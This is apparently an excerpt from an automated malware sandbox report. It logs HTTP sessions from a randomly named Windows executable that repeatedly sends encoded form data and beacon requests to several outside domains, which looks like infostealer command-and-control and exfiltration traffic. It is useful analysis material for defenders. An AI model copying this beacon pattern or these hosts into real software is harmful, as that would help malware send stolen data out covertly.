                                                                                                                                  Oct 24, 2024 08:03:54.845175982 CEST518OUTGET /moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q= HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:03:55.799308062 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  33192.168.2.45004052.20.84.62801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:01.215353966 CEST781OUTPOST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 65 42 71 2b 33 52 2b 6d 48 6c 63 4c 37 56 59 47 50 52 74 54 71 79 2b 49 4b 7a 7a 36 31 32 71 45 4a 55 68 56 4a 49 4e 6e 6e 77 37 47 41 6c 70 4d 4d 62 54 31 59 75 54 59 42 68 42 77 39 68 72 49 6a 50 41 79 35 46 50 4a 2f 6e 53 6b 54 4d 6f 6a 63 5a 38 6e 4b 53 66 6e 59 68 63 35 69 42 74 36 6a 33 4f 69 61 6d 35 69 6f 47 75 51 2b 42 38 46 51 53 7a 45 2f 36 39 50 52 45 52 45 76 77 68 62 6a 6d 65 34 38 77 6a 4c 57 76 76 7a 32 52 6e 50 50 46 37 6e 37 68 33 44 50 62 59 50 6c 32 42 41 47 38 35 46 75 37 47 4b 32 38 33 55 34 70 58 49 61 4c 43 6d 4d 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=rXgWPg4TpnazeBq+3R+mHlcL7VYGPRtTqy+IKzz612qEJUhVJINnnw7GAlpMMbT1YuTYBhBw9hrIjPAy5FPJ/nSkTMojcZ8nKSfnYhc5iBt6j3Oiam5ioGuQ+B8FQSzE/69PREREvwhbjme48wjLWvvz2RnPPF7n7h3DPbYPl2BAG85Fu7GK283U4pXIaLCmMg==
                                                                                                                                  Oct 24, 2024 08:04:01.869029999 CEST705INHTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:01 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  34192.168.2.45004152.20.84.62801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:03.767206907 CEST801OUTPOST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 79 45 4b 30 78 56 49 4a 4e 6e 67 77 37 47 50 46 70 44 44 37 54 71 59 75 65 6e 42 67 39 77 39 69 58 49 6a 4f 77 79 35 79 62 49 6c 58 53 63 4b 63 6f 74 59 5a 38 6e 4b 53 66 6e 59 68 68 63 69 43 64 36 69 48 2b 69 4c 33 35 6c 67 6d 75 54 37 42 38 46 42 43 7a 2b 2f 36 38 61 52 48 55 68 76 7a 4a 62 6a 6e 75 34 39 6c 50 49 63 76 75 34 6f 52 6d 6b 47 6b 69 37 68 53 47 51 4e 4a 45 4b 67 46 78 78 48 36 6f 66 2f 4b 6e 64 6b 38 54 6e 6c 75 65 38 58 49 2f 76 58 6c 58 72 68 65 4b 32 2f 4f 43 59 4e 6c 79 64 38 36 4e 62 5a 62 45 3d
                                                                                                                                  Data Ascii: kf-HBx=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1AyEK0xVIJNngw7GPFpDD7TqYuenBg9w9iXIjOwy5ybIlXScKcotYZ8nKSfnYhhciCd6iH+iL35lgmuT7B8FBCz+/68aRHUhvzJbjnu49lPIcvu4oRmkGki7hSGQNJEKgFxxH6of/Kndk8Tnlue8XI/vXlXrheK2/OCYNlyd86NbZbE=
                                                                                                                                  Oct 24, 2024 08:04:04.407469034 CEST705INHTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  35192.168.2.45004252.20.84.62801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:06.316636086 CEST10883OUTPOST /esft/ HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.luxe.guru
                                                                                                                                  Referer: http://www.luxe.guru/esft/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 36 45 4a 48 70 56 4a 71 6c 6e 68 77 37 47 47 6c 70 41 44 37 54 6a 59 75 57 6a 42 67 78 67 39 6e 54 49 78 38 34 79 2f 48 6e 49 77 48 53 63 43 38 6f 73 63 5a 38 49 4b 53 76 6a 59 68 52 63 69 43 64 36 69 45 6d 69 4c 6d 35 6c 6d 6d 75 51 2b 42 38 42 51 53 79 77 2f 36 31 74 52 45 35 55 6f 43 70 62 67 48 2b 34 36 54 62 49 51 76 75 36 38 78 6d 38 47 6b 65 53 68 53 4b 63 4e 49 77 67 67 43 42 78 47 50 5a 56 73 35 50 2b 7a 39 62 6c 32 50 7a 63 58 35 50 33 63 6c 4b 56 69 50 44 70 69 71 65 46 50 6d 54 71 6f 49 6c 35 43 64 75 4d 4e 2f 4f 72 6f 37 49 75 62 37 42 5a 30 6d 6a 52 47 67 74 30 6f 30 43 66 7a 6b 52 5a 4e 31 79 62 4f 35 4a 69 4e 36 4b 70 77 39 54 76 4b 6f 46 33 6d 2f 67 34 68 73 42 43 77 66 79 58 38 6f 44 42 67 64 55 41 2b 43 44 65 4c 33 2b 6d 4b 65 43 48 79 4f 4e 37 7a 4d 63 71 35 64 7a 49 75 65 65 6d 75 70 2f 48 6b 77 43 43 36 79 55 53 55 4e 6f 52 63 59 47 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1A6EJHpVJqlnhw7GGlpAD7TjYuWjBgxg9nTIx84y/HnIwHScC8oscZ8IKSvjYhRciCd6iEmiLm5lmmuQ+B8BQSyw/61tRE5UoCpbgH+46TbIQvu68xm8GkeShSKcNIwggCBxGPZVs5P+z9bl2PzcX5P3clKViPDpiqeFPmTqoIl5CduMN/Oro7Iub7BZ0mjRGgt0o0CfzkRZN1ybO5JiN6Kpw9TvKoF3m/g4hsBCwfyX8oDBgdUA+CDeL3+mKeCHyON7zMcq5dzIueemup/HkwCC6yUSUNoRcYG6tOXX+0jNi/Z7lySn8/viT1zS1F4e1eSge4T5lpNehMs+yIiGDF1gxYbu9ZxZVkhN7SqRCH7cxU1RLqtD7oQhQpCxXEMqGlMGZGJFFINHwPpytNy8wCWvPzVUbvg4AScFcRhzmAIU4POq1VL9qzNjwh3T927u2fBsCoCQjVikhiH2qStHN/jPpPKTG5Z1/Q713hxEoL6y34HYCHpepSSHCrCI+AO+eOXqb+EJStsCEQNW4HgZN8joWMvhRV6MUTE3zeC3Mr9/5J2YoIJWTr1ceOGXz2RIs+60qS2+6h97zvanAsDqddeKTzd8lyBo/1WDCVcaxFWKxq2if7Ru4olvGU0fHlkuQdtdJLVKnmGiEX9p4Kq52+FhhlpQBbQXO15H812LmesZpw7xcDdNov4PxyWAuzq7MmeegRgqjUwifB4o3ExFQwGyrWDeUVnHloPzQDyYcLHUu9RK2FCOGoNwCykqXfxjTSxsXqrjhulwjvygkFqBZD9tT9xrxMXUF7Kbf7ro0WfIciY1Q2BtulaJT6Czh/JcLezPVRDuoeufGqR/DDRf+7BOHTxxhOEH2U9rR9ycZC5JPLbzfU+9HFbQ+C8z3UXzSu4+2aw52JGGgdpe5FqneyxXgJW/Y12crvgF/5U9jRyyxUnDcxE7YGNagAzT97eszweVy [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:04:06.975811005 CEST705INHTTP/1.1 405 Not Allowed
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:06 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 556
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  36192.168.2.45004352.20.84.62801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:08.901424885 CEST518OUTGET /esft/?kf-HBx=mVI2MUxphHC6Uw3f9xz7cF5W0X1TXhBjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql1KfONw8K+kkYDnWB0Nzinc0hknaPW1TnzQ=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.luxe.guru
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:04:09.582313061 CEST357INHTTP/1.1 307 Temporary Redirect
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:09 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 168
                                                                                                                                  Connection: close
                                                                                                                                  Location: http://www.luxe.guru/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  37192.168.2.4500443.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:14.669733047 CEST805OUTPOST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4c 62 58 39 6c 6d 39 6f 38 76 44 4f 44 77 41 61 44 62 64 55 39 63 50 30 73 33 54 78 53 79 64 34 42 42 58 49 52 74 47 37 39 59 78 62 4d 6a 58 65 53 64 2b 49 79 49 38 69 32 65 36 6f 6d 68 43 45 36 55 71 66 76 77 5a 75 70 41 53 58 39 79 42 33 71 4f 48 2b 72 61 44 6d 54 4a 53 57 74 73 46 45 76 55 52 4a 59 2b 4a 7a 6a 59 38 53 37 65 35 7a 72 42 76 77 47 61 6c 72 56 48 33 72 68 7a 58 41 53 6f 6f 72 69 68 45 4c 73 70 47 47 4a 75 39 44 67 37 6e 67 64 6c 44 38 4a 5a 63 63 58 68 4e 66 53 4c 33 4a 30 6b 6d 6f 32 2b 73 66 56 32 4f 35 59 54 57 74 75 77 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=ZEfNzSM6YnFyLbX9lm9o8vDODwAaDbdU9cP0s3TxSyd4BBXIRtG79YxbMjXeSd+IyI8i2e6omhCE6UqfvwZupASX9yB3qOH+raDmTJSWtsFEvURJY+JzjY8S7e5zrBvwGalrVH3rhzXASoorihELspGGJu9Dg7ngdlD8JZccXhNfSL3J0kmo2+sfV2O5YTWtuw==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  38192.168.2.4500453.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:17.223931074 CEST825OUTPOST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 31 34 50 45 72 49 44 76 2b 37 6f 59 78 62 45 44 58 62 4d 74 2b 50 79 49 77 71 32 63 75 6f 6d 68 47 45 36 56 61 66 76 44 42 74 72 51 53 76 68 79 41 78 33 2b 48 2b 72 61 44 6d 54 4e 36 34 74 73 74 45 73 6b 42 4a 5a 66 4a 79 70 34 38 52 7a 2b 35 7a 38 78 76 30 47 61 6b 62 56 44 2b 77 68 78 66 41 53 74 4d 72 69 77 45 4d 35 5a 47 41 55 2b 38 38 68 34 61 76 44 51 4f 78 4f 36 30 2b 5a 43 5a 39 58 4e 6d 54 6c 56 48 2f 6b 2b 49 73 49 78 48 4e 56 51 72 6b 31 33 59 66 44 6a 4e 51 50 68 7a 71 49 45 36 58 67 61 47 50 49 7a 59 3d
                                                                                                                                  Data Ascii: kf-HBx=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk14PErIDv+7oYxbEDXbMt+PyIwq2cuomhGE6VafvDBtrQSvhyAx3+H+raDmTN64tstEskBJZfJyp48Rz+5z8xv0GakbVD+whxfAStMriwEM5ZGAU+88h4avDQOxO60+ZCZ9XNmTlVH/k+IsIxHNVQrk13YfDjNQPhzqIE6XgaGPIzY=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  39192.168.2.4500463.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:19.763864994 CEST10907OUTPOST /frw6/ HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.digitalbloom.info
                                                                                                                                  Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
